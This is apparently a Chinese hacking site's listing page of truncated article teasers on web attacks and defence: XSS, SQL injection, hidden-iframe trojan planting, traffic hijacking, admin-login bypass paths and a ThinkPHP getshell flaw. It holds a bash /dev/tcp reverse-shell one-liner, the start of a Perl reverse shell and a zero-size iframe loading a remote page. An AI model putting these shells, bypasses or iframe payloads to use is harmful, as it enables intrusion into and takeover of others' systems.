脚本攻防

0x00前言 我们友情进行XSS检查，偶然跳出个小弹窗，其中我们总结了一些平时可能用到的XSS插入方式，方便我们以后进行快速检查，也提供了一定的思路，其中XSS有反射、存储、DOM这三类，至于具体每个类别的异同之处，本文不做学术介绍，直接介绍实际的插入...

对于目前流行的sql注入,程序员在编写程序时,都普遍的加入防注入程序,有些防注入程序只要在我们提交一些非法的参数后,就会自动的记录下你的IP地址,提交的非法参数和动作等,同时也把非法提交的数据写入了系统的后缀为ASP的文件中,这也给了我们一些可利用的地...

下面介绍集中常见的网页挂马方式： （1）iframe 框架挂马 在网页上增加一行挂马的程序，例如：<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>...

SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安...

在鼠标点击的一刹那，流量在用户系统中流过层层节点，在路由的指引下奔向远程服务器。这段路程中短兵相接的战斗往往是最激烈的，在所有流量可能路过的节点往往都埋伏着劫持者，流量劫持的手段也层出不穷，从主页配置篡改、hosts劫持、进程Hook、启动劫持、LSP...

南海仲裁这样的闹剧昨天还是宣布了一个可笑的判决，我泱泱大国昨天在海南广东等地派出的各种军队战舰证明这次我们可不是说着玩玩。“若有战，召必回”湿了多少人的眼眶。这边，黑客军团里，也开始借南海问题各种攻击。 最近，一个与东南亚和中国...

今天到黑防站上去看看文章，可能出于“职业”习惯，看到?classid=1之类的东东就不由自主的想加点什么参数进去。 当在页面http://www.hacker.com.cn/article/index.asp?classid=3...

1.利用网站过滤不严直接绕过后台验证，在网站后面加上 admin/session.asp 或 admin/left.asp 2.有的网站进后台会出现一个脚本提示框，输入：administrator 即可突破！admin代表以管理员身份进入的意思。 3....

bash命令：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本：perl -e \’use Socket;$i="10.0.0.1";$p=1234;...

这里主要用了mysql的一个BUG ：http://bugs.mysql.com/bug.php?id=8652 grouping on certain parts of the result from rand, causes a duplicate...

先来简单说说前天thinkphp官方修复的一个getshell漏洞，框架对控制器没有进行足够的检测导致的一处getshell 影响的范围: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 导致系统被提权(你懂的) 这里附上一个自...

　　入侵电脑防御是为了更好的做好防御准备，网络安全需要我们大家来维护，一起来看看通过“鼠洞”控制电脑吧。 　　通过“鼠洞”控制你的电脑 　　夜黑风高，一个黑色的身影窜入了一间电脑机房。熟练地打开了一台保存...